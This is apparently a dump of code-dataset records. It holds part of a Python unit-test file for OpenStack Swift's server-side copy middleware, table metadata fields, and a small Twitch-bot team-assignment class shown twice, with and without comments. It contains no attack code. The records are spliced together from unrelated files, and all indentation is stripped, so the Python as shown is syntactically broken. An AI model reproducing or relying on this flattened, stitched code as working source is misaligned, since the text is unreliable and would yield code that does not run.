expected_headers.pop(h)
self.assertEqual('201 Created', status)
verify_headers(expected_headers, unexpected_headers, resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy1', path)
verify_headers(
expected_headers, unexpected_headers, put_headers.items())
self.assertNotIn('etag', put_headers)
req = Request.blank('/v1/a/c/o-copy1', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(expected_headers, unexpected_headers, resp_headers)
self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o-copy2', method='PUT',
headers={'Content-Length': 0,
'X-Copy-From': 'c/o'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy2', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
req = Request.blank('/v1/a/c/o-copy2', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(source_headers.copy(), [], resp_headers)
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='PUT',
headers={'Content-Length': 0,
'X-Copy-From': 'c/o'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
def test_COPY_no_destination_header(self):
req = Request.blank(
'/v1/a/c/o', method='COPY', headers={'Content-Length': 0})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
self.assertEqual(len(self.authorized), 0)
def test_basic_COPY_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o2',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o2', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path)
def test_COPY_across_containers(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c2/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o', self.authorized[1].path)
def test_COPY_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_bad_destination_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'X-Object-Meta-Ours': 'okay',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_in_OPTIONS_response(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertNotIn('swift.orig_req_method', req.environ)
def test_COPY_in_OPTIONS_response_CORS(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT',
'Access-Control-Allow-Methods': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertTrue(('Access-Control-Allow-Methods',
'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def _test_COPY_source_headers(self, extra_put_headers):
put_headers = {'Destination': '/c1/o',
'X-Object-Meta-Test2': 'added',
'X-Object-Sysmeta-Test2': 'added',
'X-Object-Transient-Sysmeta-Test2': 'added'}
put_headers.update(extra_put_headers)
get_resp_headers = {
'X-Timestamp': '1234567890.12345',
'X-Backend-Timestamp': '1234567890.12345',
'Content-Type': 'text/original',
'Content-Encoding': 'gzip',
'Content-Disposition': 'attachment; filename=myfile',
'X-Object-Meta-Test': 'original',
'X-Object-Sysmeta-Test': 'original',
'X-Object-Transient-Sysmeta-Test': 'original',
'X-Foo': 'Bar'}
self.app.register(
'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers)
self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers)
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
self.assertEqual(2, len(calls))
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('added', req_headers.get('X-Object-Meta-Test2'))
self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2'))
self.assertEqual('added',
req_headers.get('X-Object-Transient-Sysmeta-Test2'))
return req_headers
def test_COPY_source_headers_no_updates(self):
req_headers = self._test_COPY_source_headers({})
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=myfile',
req_headers.get('Content-Disposition'))
self.assertEqual('original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_source_headers_with_updates(self):
put_headers = {
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_x_fresh_metadata_no_updates(self):
put_headers = {
'X-Fresh-Metadata': 'true',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertIn('X-Fresh-Metadata', req_headers)
self.assertNotIn('X-Object-Meta-Test', req_headers)
self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers)
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
self.assertNotIn('Content-Encoding', req_headers)
self.assertNotIn('Content-Disposition', req_headers)
self.assertNotIn('X-Foo', req_headers)
def test_COPY_x_fresh_metadata_with_updates(self):
put_headers = {
'X-Fresh-Metadata': 'true',
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
def test_COPY_with_single_range(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'etag': 'bogus etag'}, "abcdefghijklmnop")
self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
req = swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Destination': 'c1/o',
'Range': 'bytes=5-10'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
self.assertEqual(2, len(calls))
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c1/o', path)
self.assertNotIn('etag', (h.lower() for h in req_headers))
self.assertEqual('6', req_headers['content-length'])
req = swob.Request.blank('/v1/a/c1/o', method='GET')
status, headers, body = self.call_ssc(req)
self.assertEqual('fghijk', body)
@patch_policies(with_ec_default=True)
class TestServerSideCopyMiddlewareWithEC(unittest.TestCase):
container_info = {
'status': 200,
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
def setUp(self):
self.logger = debug_logger('proxy-server')
self.logger.thread_locals = ('txn1', '127.0.0.2')
self.app = PatchedObjControllerApp(
None, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
self.ssc = copy.filter_factory({})(self.app)
self.ssc.logger = self.app.logger
self.policy = POLICIES.default
self.app.container_info = dict(self.container_info)
def test_COPY_with_single_range(self):
req = swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Destination': 'c1/o',
'Range': 'bytes=5-10'})
segment_size = self.policy.ec_segment_size
real_body = ('asdf' * segment_size)[:-10]
chunks = [real_body[x:x + segment_size]
for x in range(0, len(real_body), segment_size)]
fragments = self.policy.pyeclib_driver.encode(chunks[0])
fragment_payloads = []
fragment_payloads.append(fragments)
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas)
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
responses += [(201, '', {})] * self.policy.object_ring.replicas
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
put_hdrs = []
def capture_conn(host, port, dev, part, method, path, *args, **kwargs):
if method == 'PUT':
put_hdrs.append(args[0])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers,
give_connect=capture_conn):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 201)
expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity
self.assertEqual(expected_puts, len(put_hdrs))
for hdrs in put_hdrs:
self.assertNotIn('etag', (h.lower() for h in hdrs))
def test_COPY_with_invalid_ranges(self):
segment_size = self.policy.ec_segment_size
real_body = ('a' * segment_size)[:-10]
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size - 10))
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size + 10))
def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
body_etag = md5(real_body).hexdigest()
req = swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'Destination': 'c1/o',
'Range': 'bytes=%s' % (req_range)})
fragments = self.policy.pyeclib_driver.encode(real_body)
fragment_payloads = [fragments]
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas)
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
'X-Object-Sysmeta-Ec-Etag': body_etag}
start = int(req_range.split('-')[0])
self.assertTrue(start >= 0)
title, exp = swob.RESPONSE_REASONS[416]
range_not_satisfiable_body = \
'<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
if start >= segment_size:
responses = [(416, range_not_satisfiable_body, headers)
for i in range(POLICIES.default.ec_ndata)]
else:
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 416)
self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
self.assertEqual(resp.body, range_not_satisfiable_body)
self.assertEqual(resp.etag, body_etag)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
| true
| true
|
f705def54e26d0238b7f51ef53f14a89af887b66
| 1,087
|
py
|
Python
|
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
src/bot/TeamData.py
|
malmgrens4/TwIOTch
|
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
|
[
"MIT"
] | null | null | null |
from typing import Dict
from twitchio.dataclasses import Message
class TeamData:
def __init__(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
async def handle_join(self, msg: Message) -> None:
if msg.author.id in self.teams:
# User already on a team
return
all_teams = self.teams.values()
if len(all_teams) < self.num_teams:
self.teams[msg.author.id] = len(all_teams)
return
team_counts: Dict[int, int] = {}
for team_id in all_teams:
team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1
min_member_team_id = min(team_counts, key=team_counts.get)
self.teams[msg.author.id] = min_member_team_id
def get_team_member_map(self):
reverse_dict = {}
for k, v in self.teams.items():
reverse_dict.setdefault(v, []).append(k)
return reverse_dict
def reset(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
| 29.378378
| 73
| 0.609016
|
from typing import Dict
from twitchio.dataclasses import Message
class TeamData:
def __init__(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
async def handle_join(self, msg: Message) -> None:
if msg.author.id in self.teams:
return
all_teams = self.teams.values()
if len(all_teams) < self.num_teams:
self.teams[msg.author.id] = len(all_teams)
return
team_counts: Dict[int, int] = {}
for team_id in all_teams:
team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1
min_member_team_id = min(team_counts, key=team_counts.get)
self.teams[msg.author.id] = min_member_team_id
def get_team_member_map(self):
reverse_dict = {}
for k, v in self.teams.items():
reverse_dict.setdefault(v, []).append(k)
return reverse_dict
def reset(self, num_teams: int = 2):
self.num_teams = num_teams
self.teams: Dict[int, int] = {}
| true
| true
|
f705df36178023a0b1008fe69f304ba47ddbd2e2
| 7,661
|
py
|
Python
|
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
|
EnricoMagnago/F3
|
